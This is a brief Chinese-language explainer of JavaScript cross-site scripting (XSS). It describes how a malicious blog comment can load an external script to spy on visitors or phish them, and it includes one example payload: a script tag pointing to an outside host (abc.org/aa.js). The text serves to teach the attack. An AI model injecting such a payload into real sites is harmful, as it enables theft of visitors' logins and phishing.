JavaScript跨站脚本攻击

　　跨站脚本攻击（Cross-Site Scrpting）简称为XSS，指的是向其他域中的页面的DOM注入一段脚本，该域对其他用户可见。恶意用户可能会试图利用这一弱点记录用户的击键或操作行为，以窃取用户的某些信息。在过去，包含用户提交内容的站点特别容易成为这一漏洞的目标。例如：用户在博客中提交评论，并且在其中包含类似于如下代码的脚本块：

Nice Bolg！Thanks for post that ...<script type="text/javascript" src="http://abc.org/aa.js"></script>

当浏览该页面时，仅有评论是可见的，但对于每一个访问该页面的用户，浏览器都将为该用户下载一份外部脚本。在该外部脚本中可以窥探用户的登录信息或者其他屏幕内容，甚至重写DOM以实现网络钓鱼的企图。